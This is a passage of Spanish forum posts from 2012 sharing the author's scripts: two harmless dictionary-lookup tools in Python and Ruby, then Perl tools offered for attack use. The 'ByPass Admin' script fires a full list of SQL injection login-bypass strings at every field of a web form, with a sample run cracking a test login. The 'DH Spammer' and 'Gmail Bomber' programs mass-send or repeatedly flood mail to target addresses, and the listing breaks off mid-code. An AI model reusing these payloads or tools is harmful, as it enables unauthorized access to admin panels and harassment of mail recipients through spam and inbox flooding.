281
Programación / Scripting / [Python] Diccionario Online 0.1
en: 19 Marzo 2012, 02:05 am
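Un pequeño script en Python que hice para buscar una definicion a cualquier palabra que se ingrese. El codigo

#!/usr/bin/python
#Diccionario Online 0.1
#Coded By Doddy H
#
# Python 2 script: asks for a word, downloads its page from
# es.thefreedictionary.com and prints the first numbered definition.
# The page is fetched over plain HTTP, so its content is unauthenticated;
# it is only pattern-matched and printed, never evaluated.

import urllib, urllib2, re, sys, HTMLParser

# Text of sense "1" in the page markup, up to the first '.', ':' or '<'.
DEFINICION = re.compile(r"<div class=runseg><b>1 <\/b> (.*?)[.:<]")


def toma(web):
    """Fetch `web` with a browser-like User-Agent and return the raw body."""
    nave = urllib2.Request(web)
    nave.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')
    op = urllib2.build_opener()
    # A timeout keeps a stalled server from hanging the script forever.
    return op.open(nave, timeout=10).read()


def head():
    """Print the banner."""
    # NOTE: the banner's original line layout is not recoverable from the
    # page; the text is kept as it is shown there.
    print """ @@@@ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@@ @ @@ @@@ @@ @ @@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @@@ @@@ @ @@@ @ @ @@@@ @ @ @@@ Coded By Doddy H """


def copyright():
    """Print the footer, wait for Enter and leave."""
    print "\n\n(C) Doddy Hackman 2012\n"
    raw_input()
    # Exit status kept as in the original script.
    sys.exit(1)


head()

palabra = raw_input("\n\n[+] Palabra : ")

try:
    # The word is free-form input that ends up in the URL path. Percent-encode
    # it (safe="" also encodes "/") so that spaces and accented letters work
    # and so that "/", "?", "#" or ".." in the input cannot change which
    # resource is requested.
    code = toma("http://es.thefreedictionary.com/" + urllib.quote(palabra, safe=""))
    encontrados = DEFINICION.findall(code)
    definicion = ""
    if encontrados:
        definicion = HTMLParser.HTMLParser().unescape(encontrados[0])
    if definicion != "":
        print "\n\n[+] Definicion : " + definicion
    else:
        print "[-] No se encontro significado\n"
except Exception:
    # Still best-effort, but no longer a bare "except:", which would also
    # swallow KeyboardInterrupt and SystemExit.
    print "[-] Error\n"

copyright()

# The End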
282
Programación / Scripting / [Ruby] Diccionario Online 0.1
en: 19 Marzo 2012, 02:04 am
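Un simple script en Ruby para buscar la definicion de cualquier palabra El codigo

#!/usr/bin/ruby
#Diccionario Online 0.1
#Coded By Doddy H
#
# Asks for a word, downloads its page from es.thefreedictionary.com and
# prints the first numbered definition. The page comes over plain HTTP, so
# its content is unauthenticated; it is only pattern-matched and printed.

require "net/http"
require "cgi"

# Print the banner.
# NOTE: the banner's original line layout is not recoverable from the page;
# the text is kept as it is shown there.
def head()
  print " @@@@ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@@ @ @@ @@@ @@ @ @@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @@@ @@@ @ @@@ @ @ @@@@ @ @ @@@ Coded By Doddy H "
end

# Print the footer and leave (exit status kept as in the original script).
def copyright()
  print "\n\n(C) Doddy Hackman 2012\n\n"
  exit(1)
end

# GET +web+ and return the response body.
def toma(web)
  return Net::HTTP.get_response(URI.parse(web)).body
end

head()

print "\n[+] Palabra : "
# gets returns nil at end of input; to_s keeps chomp from raising.
string = gets.to_s.chomp

# The word is free-form input that ends up in the URL path. Percent-encode it
# so that spaces and accented letters do not make URI.parse raise, and so that
# "/", "?" or "#" in the input cannot change which resource is requested.
# CGI.escape writes a space as "+", which means "space" only in query
# strings, so it is turned into %20 here (a literal "+" is already %2B).
url = "http://es.thefreedictionary.com/" + CGI.escape(string).gsub("+", "%20")

begin
  code = toma(url)
rescue StandardError, Timeout::Error
  # Network or URI failure: report it instead of ending in a stack trace.
  print "\n\n[-] Error"
  copyright()
end

if code =~ /<div class=runseg><b>1 <\/b> (.*?)[.:<]/
  text = CGI.unescapeHTML($1)
  if text.strip.empty?
    print "\n\n[-] Palabra no encontrada"
  else
    print "\n\n[+] Definicion : "+text
  end
else
  # No definition block in the page: say so instead of printing nothing.
  print "\n\n[-] Palabra no encontrada"
end

copyright()

#The End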
283
Programación / Scripting / [Perl] ByPass Admin 0.1
en: 13 Marzo 2012, 18:50 pm
Acabo de terminar un programa que he estado haciendo estos últimos 3 días; se trata de un script hecho en Perl para realizar los famosos y míticos bypass en los paneles de administración. Lo bueno es que parsea todos los formularios encontrados en la página marcada para que todo sea más automático. El programa depende de un archivo de texto llamado bypass.txt, que se lee línea por línea. Estas cadenas solo surten efecto cuando el panel arma la consulta SQL concatenando lo que recibe del formulario; frente a consultas parametrizadas no hacen nada. El contenido de bypass.txt es: admin'-- 'or'1'='1 'or' ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a - ' or 'x'='x - ' or 'x'='x 'or'1 ou 'or''=' ' or 'x'='x admin' or 1==1 ' OR "=' 'or'1'='1
El codigo (formateado con perltidy) es

#!usr/bin/perl
#ByPass Admin 0.1
#Coded By Doddy H
#
# Interactive console script. As shown on this page it:
#   1. downloads the page given at the prompt and lists every form that
#      HTML::Form finds in it, together with its inputs;
#   2. asks which form and which submit button to use;
#   3. submits that form once per line of bypass.txt, putting the line into
#      every non-submit field, and reports the lines whose response passes
#      the selected check.
# NOTE(review): several statements look lost in the page extraction (the
# opening of the print in head(), prompts such as the "[+] Submit : " and
# "1 - Positive 2 - Negative" lines visible in the sample run, the write in
# savefile()). The code is kept exactly as shown, not repaired.
# NOTE(review, defensive): on the server side this shows up as a burst of
# ordinary form submissions from one client, all carrying the fixed
# User-Agent set below and quote / "or" / comment sequences in every field.
# A login that binds its inputs as query parameters is unaffected by such
# values, because the script only changes field contents.
use LWP::UserAgent;
use HTML::Form;

# One shared user agent: fixed browser-like User-Agent string, 5 s timeout.
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();
start();
copyright();

# Prompt for the page, list its forms, then run the selected check mode.
sub start {
    print "\n\n[+] Admin : ";
    chomp( my $url = <STDIN> );
    my $code = toma($url);

    # "/" is the base URI handed to HTML::Form for resolving form actions.
    my @testar = HTML::Form->parse( $code, "/" );
    $count = 0;    # package global; there is no "use strict" in this script
    foreach my $test (@testar) {
        $count++;
        print "\n\n -- == Form $count == --\n\n";

        # "name" is a bareword here; it only parses because strict is off.
        if ( $test->attr(name) eq "" ) {
            print "[+] Name : No Found" . "\n";
        }
        else {
            print "[+] Name : " . $test->attr(name ) . "\n";
        }
        print "[+] Action : " . $test->action . "\n";
        print "[+] Method : " . $test->method . "\n";
        print "\n-- == Input == --\n\n";
        @inputs = $test->inputs;
        foreach $in (@inputs) {
            print "\n[+] Type : " . $in->type . "\n";
            print "[+] Name : " . $in->name . "\n";
            print "[+] Value : " . $in->value . "\n";
        }
    }
    print "\n\n[+] Form to crack : ";
    chomp( my $op = <stdin> );     # 1-based form number
    chomp( my $aca = <stdin> );    # name of the submit button to send
    print "\n[+] Options to check\n\n";
    print "3 - Automatic\n\n";
    chomp( my $op2 = <stdin> );
    my @bypass = loadword();

    # Mode 1: a candidate counts when the response matches the given string.
    if ( $op2 eq "1" ) {
        chomp( my $st = <stdin> );
        print "\n\n[+] Cracking login....\n\n";
        for my $by (@bypass) {
            my $code = load( $url, $code, $op, $aca, $by );

            # $st is interpolated as a regex without quoting, so regex
            # metacharacters typed at the prompt act as pattern syntax.
            if ( $code =~ /$st/ig ) { cracked( $url, $by ); }
        }
        print "\n[+] Finished\n";
    }

    # Mode 2: a candidate counts when the response does NOT match the string.
    if ( $op2 eq "2" ) {
        chomp( my $st = <stdin> );
        print "\n\n[+] Cracking login....\n\n";
        for my $by (@bypass) {
            my $code = load( $url, $code, $op, $aca, $by );
            unless ( $code =~ /$st/ig ) { cracked( $url, $by ); }
        }
        print "\n[+] Finished\n";
    }

    # Mode 3: a candidate counts when the response differs from a baseline
    # response obtained with a fixed dummy value. Any per-request difference
    # in the page (a token, a timestamp) would also count as a difference.
    if ( $op2 eq "3" ) {
        print "\n\n[+] Cracking login....\n\n";
        my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" );
        for my $by (@bypass) {
            my $code = load( $url, $code, $op, $aca, $by );
            unless ( $code eq $prueba_falsa ) { cracked( $url, $by ); }
        }
        print "\n[+] Finished\n";
    }
}

# Submit form number $op of the page source $code with $text in every
# non-submit field.
# NOTE(review): no explicit return is visible although start() uses this
# sub's value; either it relies on Perl's implicit last-value return or a
# return statement was lost from the page -- confirm.
# NOTE(review): @ordenuno, @botones_names and @botones_values are package
# globals that are never cleared, so they keep growing from call to call.
sub load {
    my ( $url, $code, $op, $aca, $text ) = @_;
    $op--;    # form number entered by the user is 1-based
    my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];
    for my $testa (@probar) {
        if ( $testa->method eq "POST" ) {
            my @inputs = $testa->inputs;
            for my $in (@inputs) {
                if ( $in->type eq "submit" ) {
                    if ( $in->name eq $aca ) {
                        push( @botones_names,  $in->name );
                        push( @botones_values, $in->value );
                    }
                }
                else {
                    push( @ordenuno, $in->name, $text );
                }
            }
            my @preuno = @ordenuno;
            push( @preuno, $botones_names[0], $botones_values[0] );

            # The POST goes to the URL that was typed in, not to the
            # form's own action attribute.
            my $codeuno = $nave->post( $url, \@preuno )->content;
        }
        else {
            my $final    = "";
            my $orden    = "";
            my $partedos = "";
            my @inputs   = $testa->inputs;
            for my $testa (@inputs) {
                if ( $testa->name eq $aca ) {
                    push( @botones_names,  $testa->name );
                    push( @botones_values, $testa->value );
                }
                else {
                    # Values are appended to the query string without
                    # URL-encoding.
                    $orden .= '' . $testa->name . '=' . $text . '&';
                }
            }
            my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0];
            my $final = $url . "?" . $orden . $partedos;
            $codedos = toma($final);
        }
    }
}

# Report a candidate on screen, pass it to savefile() and show the footer.
sub cracked {
    print "[+] Login Cracked\n\n";
    print "[+] URL : $_[0]\n";
    print "[+] Bypass : $_[1]\n";
    savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
    savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
    copyright();
}

# Read bypass.txt from the current directory.
# The open is two-argument, uses a bareword handle and is not checked; the
# lines are not chomped, so each entry keeps its trailing newline.
sub loadword {
    my $file = "bypass.txt";
    if ( -f $file ) {
        open( FI , "bypass.txt" );
        my @txts = <FI>;
    }
    else {
        print "\n\n[-] Wordlist not found\n\n";
        copyright();
    }
}

# Banner. NOTE(review): the opening of the print statement is missing on the
# page, so this sub does not parse as shown.
sub head { @@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @ @ @@ ); }

# Print the footer and wait for Enter.
sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";
    <stdin>;
}

# As shown, this only opens the file named in $_[0] for appending; no print
# or close is visible (presumably lost from the page).
sub savefile {
    open( SAVE , ">>" . $_[0] );
}

# GET the URL in $_[0] and return the response content.
sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?
Un ejemplo de uso
@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @ @ @@
[+] Admin : http://localhost/labs/bypass/primero.php
-- == Form 1 == --
[+] Name : No Found [+] Action : / [+] Method : POST
-- == Input == --
[+] Type : text [+] Name : usuario [+] Value :
[+] Type : password [+] Name : password [+] Value :
[+] Type : submit [+] Name : logeo [+] Value : Entrar
[+] Form to crack : 1
[+] Submit : logeo
[+] Options to check
1 - Positive 2 - Negative 3 - Automatic
[+] Option : 1
[+] String : exitoso
[+] Cracking login....
[+] Login Cracked
[+] URL : http://localhost/labs/bypass/primero.php [+] Bypass : 'or'1'='1
(C) Doddy Hackman 2012
284
Programación / Scripting / [Perl] DH Spammer 0.1
en: 1 Marzo 2012, 22:21 pm
Hola a todos, acá les traigo un programa que hice para mandar mails con las siguientes opciones: - Mensajes que permitan código HTML.
- Adjuntar archivos
- Mandar la cantidad que quieran
- Se maneja con una lista de correos (para poder enviar el mismo mail a varios correos)
Para usarlo necesitan una cuenta Gmail para indicarle al programa que los mensajes van a ser enviados desde esa cuenta. Una imagen del programa El codigo (formateado con perltidy) es ...........

#!usr/bin/perl
#DH Spammer 0.1
#Coded By Doddy H
#Dependencies
#http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
#http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
#http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
#ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
#http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
#Based on http://robertmaldon.blogspot.com/2006/10/sending-email-through-google-smtp-from.html
#
# Tk front end that logs in to smtp.gmail.com:465 with the account typed
# into the window and sends the same subject/body, a chosen number of times,
# to every address in the list box, with or without an attachment.
# NOTE(review): no "use strict" / "use warnings"; several variables below
# are package globals, and no return value of the SMTP calls is checked.
# NOTE(review): with the IO::Socket::SSL release linked above, server
# certificate verification is presumably off by default, in which case the
# account password is sent to a peer that was never authenticated -- confirm.
use Tk;
use Tk::ROText;
use Tk::FileSelect;
use Email::Send::SMTP::Gmail;
use Net::SMTP::SSL;
use Cwd;

# "use" runs at compile time, so Win32::Console is loaded on every platform
# regardless of this test; only the Free() call is conditional.
if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

my $color_fondo = "black";
my $color_texto = "white";

# Main window.
my $ve = MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ve->geometry("920x560+20+20");
$ve->resizable( 0, 0 );
$ve->title("DH Spammer 0.1 (C) Doddy Hackman 2012");

# Menu bar.
$d = $ve->Frame(
    -relief => "sunken", -bd => 1,
    -background => $color_fondo, -foreground => $color_texto
);
my $ma = $d->Menubutton(
    -text => "Mails", -underline => 1,
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $op = $d->Menubutton(
    -text => "Options", -underline => 1,
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $ab = $d->Menubutton(
    -text => "About", -underline => 1,
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $ex = $d->Menubutton(
    -text => "Exit", -underline => 1,
    -background => $color_fondo, -foreground => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
$d->pack( -side => "top", -fill => "x" );

# Menu entries and their callbacks.
$ma->command(
    -label => "Add Mailist",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&addmailist
);
$ma->command(
    -label => "Add Mail",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&addmail
);
$ma->command(
    -label => "Clean List",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&delist
);
$op->command(
    -label => "Spam Now",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&spamnow
);
$op->command(
    -label => "Add Attachment",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&addfile
);
$op->command(
    -label => "Clean All",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&clean
);
$ab->command(
    -label => "About",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&about
);

# NOTE(review): no sub named "chali" is defined anywhere in this listing.
$ex->command(
    -label => "Exit",
    -background => $color_fondo, -foreground => $color_texto,
    -command => \&chali
);

# Login section. Both entries start with placeholder text; the password
# entry masks what is typed with "*".
$ve->Label(
    -text => "Gmail Login", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 100, -y => 40 );
$ve->Label(
    -text => "Username : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 80 );
my $user = $ve->Entry(
    -width => 30, -text => 'lagartojuancho@gmail.com',
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 83, -x => 85 );
$ve->Label(
    -text => "Password : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 120 );
my $pass = $ve->Entry(
    -show => "*", -width => 30, -text => 'Secret',
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 123, -x => 85 );

# Message section: copies per address, attachment path ("None" means no
# attachment), subject and body.
$ve->Label(
    -text => "Message", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 110, -y => 160 );
$ve->Label(
    -text => "Number : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 210 );
my $number = $ve->Entry(
    -width => 5, -text => "1",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 75, -y => 212 );
$ve->Label(
    -text => "Attachment : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 240 );
my $fi = $ve->Entry(
    -text => 'None', -width => 30,
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 90, -y => 242 );
$ve->Label(
    -text => "Subject : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 270 );
my $tema = $ve->Entry(
    -text => "Hi idiot", -width => 20,
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 73, -y => 273 );
$ve->Label(
    -text => "Body", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 110, -y => 310 );
my $body = $ve->Scrolled(
    "Text", -width => 30, -height => 12,
    -background => $color_fondo, -foreground => $color_texto,
    -scrollbars => "e"
)->place( -x => 45, -y => 350 );
$body->insert( "end", "Welcome to the hell" );

# Recipient list and read-only log console.
$ve->Label(
    -text => "Mailist", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 40, -x => 400 );
my $mailist = $ve->Listbox(
    -height => 31, -width => 33,
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 85, -x => 330 );
$ve->Label(
    -text => "Console", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 40, -x => 685 );
my $console = $ve->Scrolled(
    "ROText", -width => 40, -height => 31,
    -background => $color_fondo, -foreground => $color_texto,
    -scrollbars => "e"
)->place( -x => 580, -y => 84 );

MainLoop;

# Dialog for loading a file of addresses into the list box.
# NOTE(review): brona and bronaxa are named subs declared inside this sub.
# Perl compiles named subs once, so they presumably stay bound to the $adda
# and $en of the first call only -- confirm.
sub addmailist {
    my $adda = MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
    $adda->geometry("400x90+20+20");
    $adda->resizable( 0, 0 );
    $adda->title("Add Mailist");
    $adda->Label(
        -text => "Mailist : ",
        -background => $color_fondo, -foreground => $color_texto,
        -font => "Impact1"
    )->place( -x => 10, -y => 30 );
    my $en = $adda->Entry(
        -background => $color_fondo, -foreground => $color_texto,
        -width => 33
    )->place( -y => 33, -x => 75 );
    $adda->Button(
        -text => "Browse",
        -background => $color_fondo, -foreground => $color_texto,
        -width => 7, -activebackground => $color_texto,
        -command => \&brona
    )->place( -y => 33, -x => 285 );
    $adda->Button(
        -text => "Load",
        -background => $color_fondo, -foreground => $color_texto,
        -width => 7, -activebackground => $color_texto,
        -command => \&bronaxa
    )->place( -y => 33, -x => 340 );

    # File chooser starting in the current directory; the chosen path is
    # written into the entry.
    sub brona {
        $browse = $adda->FileSelect( -directory => getcwd() );
        my $file = $browse->Show;
        $en->configure( -text => $file );
    }

    # Reads every line from the handle FILE into the list box.
    # NOTE(review): no open of FILE is visible in this listing (presumably
    # lost from the page). The lines are not chomped, so each list entry
    # keeps its trailing newline.
    sub bronaxa {
        @words = <FILE>;
        for (@words) {
            $mailist->insert( "end", $_ );
        }
    }
}

# Dialog for choosing the attachment; "Load" copies the path into the main
# window's attachment entry.
sub addfile {
    my $addax = MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
    $addax->geometry("390x90+20+20");
    $addax->resizable( 0, 0 );
    $addax->title("Add File");
    $addax->Label(
        -text => "File : ",
        -background => $color_fondo, -foreground => $color_texto,
        -font => "Impact1"
    )->place( -x => 10, -y => 30 );
    my $enaf = $addax->Entry(
        -background => $color_fondo, -foreground => $color_texto,
        -width => 33
    )->place( -y => 33, -x => 55 );
    $addax->Button(
        -text => "Browse",
        -background => $color_fondo, -foreground => $color_texto,
        -width => 7, -activebackground => $color_texto,
        -command => \&bronax
    )->place( -y => 33, -x => 265 );
    $addax->Button(
        -text => "Load",
        -background => $color_fondo, -foreground => $color_texto,
        -width => 7, -activebackground => $color_texto,
        -command => \&bronaxx
    )->place( -y => 33, -x => 320 );

    sub bronax {
        $browse = $addax->FileSelect( -directory => getcwd() );
        my $filea = $browse->Show;
        $enaf->configure( -text => $filea );
    }

    sub bronaxx {
        $fi->configure( -text => $enaf->get );
    }
}

# Dialog for adding a single address to the list box.
sub addmail {
    my $add = MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
    $add->geometry("350x90+20+20");
    $add->resizable( 0, 0 );
    $add->title("Add Mail");
    $add->Label(
        -text => "Mail : ",
        -background => $color_fondo, -foreground => $color_texto,
        -font => "Impact1"
    )->place( -x => 10, -y => 30 );
    my $ew = $add->Entry(
        -background => $color_fondo, -foreground => $color_texto,
        -width => 33
    )->place( -y => 33, -x => 60 );
    $add->Button(
        -text => "Add",
        -background => $color_fondo, -activebackground => $color_texto,
        -foreground => $color_texto,
        -width => 7, -command => \&addnow
    )->place( -y => 33, -x => 275 );

    sub addnow {
        $mailist->insert( "end", $ew->get );
    }
}

# Empty the recipient list.
sub delist {
    $mailist->delete( 0.0, "end" );
}

# "Spam Now": test the login once, then send to every address in the list.
sub spamnow {
    $console->delete( 0.1, "end" );
    my $control = "0";

    # Login probe. The result of new() is not checked, so a failed
    # connection leads to a method call on undef at auth().
    my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
    if ( $msg->auth( $user->get, $pass->get ) ) {
        $control = "1";
    }
    else {
        $control = "0";
    }
    $msg->quit();

    if ($control) {
        $console->insert( "end", "[+] Starting the Party\n\n" );
        my @mails = $mailist->get( "0.0", "end" );
        for my $mail (@mails) {
            $ve->update;    # keep the window responsive between sends
            $console->insert( "end", "[+] Mail : $mail\n" );
            my $text = $body->get( "1.0", "end" );

            # The literal text "None" in the attachment entry selects the
            # plain-SMTP path.
            if ( $fi->get eq "None" ) {
                singlemail( $user->get, $pass->get, $mail, $tema->get, $text, $number->get );
            }
            else {
                singlemailwithfile( $user->get, $pass->get, $mail, $tema->get, $text, $fi->get, $number->get );
            }
        }
        $console->insert( "end", "\n\n[+] Finished" );
    }
    else {
        $console->insert( "end", "[-] Bad Login\n" );
    }
}

# Send $cantidad copies of one HTML message to $target over raw SMTP.
# A new connection and a new login are made for every copy, and none of the
# calls is checked for failure.
# NOTE(review): sender, recipient and subject are concatenated into the
# header block as they are; a line break inside any of them would start an
# extra header line. Header lines end in "\n" rather than "\r\n", and "\n"
# is also appended to the envelope addresses.
sub singlemail {
    my ( $user, $password, $target, $asunto, $mensaje, $cantidad ) = @_;
    for ( 1 .. $cantidad ) {
        my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
        $msg->auth( $user, $password );
        $msg->mail( $user . "\n" );
        $msg->to( $target . "\n" );
        $msg->data();
        $msg->datasend( "From: " . $user . "\n" );
        $msg->datasend( "To: " . $target . "\n" );
        $msg->datasend( "Subject: " . $asunto . "\n" );
        $msg->datasend("Content-Type: text/html \n");
        $msg->datasend("\n");
        $msg->datasend( $mensaje . "\n" );
        $msg->dataend();
        $msg->quit();
    }
}

# Send $cantidad copies with the attachment $file through
# Email::Send::SMTP::Gmail, reusing one session for all copies.
sub singlemailwithfile {
    my ( $user, $password, $target, $asunto, $mensaje, $file, $cantidad ) = @_;
    my $mail = Email::Send::SMTP::Gmail->new(
        -smtp => "gmail.com", -login => $user, -pass => $password
    );
    for my $number ( 1 .. $cantidad ) {
        $mail->send(
            -to => $target, -subject => $asunto,
            -body => $mensaje, -attachments => $file
        );
    }
    $mail->bye;
}

# "Clean All": reset the entries and empty the body, list and console.
sub clean {
    $user->configure( -text => " " );
    $pass->configure( -text => " " );
    $number->configure( -text => " " );
    $fi->configure( -text => "None" );
    $tema->configure( -text => " " );
    $body->delete( 0.1, "end" );
    $mailist->delete( 0.0, "end" );
    $console->delete( 0.1, "end" );
}

# About window with the author's contact details.
sub about {
    $about = MainWindow->new( -background => "black" );
    $about->title("About");
    $about->geometry("300x110");
    $about->resizable( 0, 0 );
    $about->Label( -background => "black", -foreground => "white" )->pack();
    $about->Label(
        -text => "Contact : lepuke[at]hotmail[com]", -font => "Impact",
        -background => "black", -foreground => "white"
    )->pack();
    $about->Label(
        -text => "Web : doddyhackman.webcindario.com", -font => "Impact",
        -background => "black", -foreground => "white"
    )->pack();
    $about->Label(
        -text => "Blog : doddy-hackman.blogspot.com", -font => "Impact",
        -background => "black", -foreground => "white"
    )->pack();
}

#The End ?
285
Programación / Scripting / [Perl] Gmail Bomber 0.3
en: 23 Febrero 2012, 17:39 pm
Hola a todos , aca les traigo un gmail bomber que hice para el torneo de programacion de HackXCrack , se trata de un simple mail bomber para Gmail , aca les dejo una imagen del programa en uso donde me envio 40 mensajes a mi cuenta Y mi casilla quedo asi El codigo del programa (formateado con perltidy) es

#!usr/bin/perl
#Gmail Bomber 0.2
#Dependencies
#http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
#http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
#http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
#ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
#http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
#
# Tk window that logs in through Email::Send::SMTP::Gmail with the account
# typed into it and sends the same subject/body to one address as many times
# as the "Number" field says.
# NOTE(review): the post title says 0.3 while the header and the window
# title say 0.2. There is no "use strict" / "use warnings".
use Tk;
use Win32;    # unconditional, so the script loads only where Win32 exists
use Email::Send::SMTP::Gmail;

# "use" runs at compile time, so Win32::Console is loaded regardless of this
# test; only the Free() call is conditional.
if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

my $color_fondo = "black";
my $color_texto = "green";

# Main window.
my $ve = MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ve->geometry("300x600+20+20");
$ve->resizable( 0, 0 );
$ve->title("Gmail Bomber 0.2");

# Login section. Both entries start with placeholder text; the password
# entry masks what is typed with "*".
$ve->Label(
    -text => "Login", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 110, -y => 30 );
$ve->Label(
    -text => "Username : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 80 );
my $user = $ve->Entry(
    -width => 30, -text => 'lagartojuancho@gmail.com',
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 83, -x => 85 );
$ve->Label(
    -text => "Password : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 120 );
my $pass = $ve->Entry(
    -show => "*", -width => 30, -text => 'Secret',
    -background => $color_fondo, -foreground => $color_texto
)->place( -y => 123, -x => 85 );

# Message section: number of copies, recipient, subject, body.
$ve->Label(
    -text => "Message", -font => "Impact3",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 110, -y => 160 );
$ve->Label(
    -text => "Number : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 210 );
my $number = $ve->Entry(
    -width => 5, -text => "20",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 75, -y => 212 );
$ve->Label(
    -text => "Target : ",
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 20, -y => 240 );
my $to = $ve->Entry(
    -text => 'idiot@gmail.com', -width => 30,
    -background => $color_fondo, -foreground => $color_texto
)->place( -x => 73, -y => 242 );
$ve->Label(
    -text => "Subject : ",
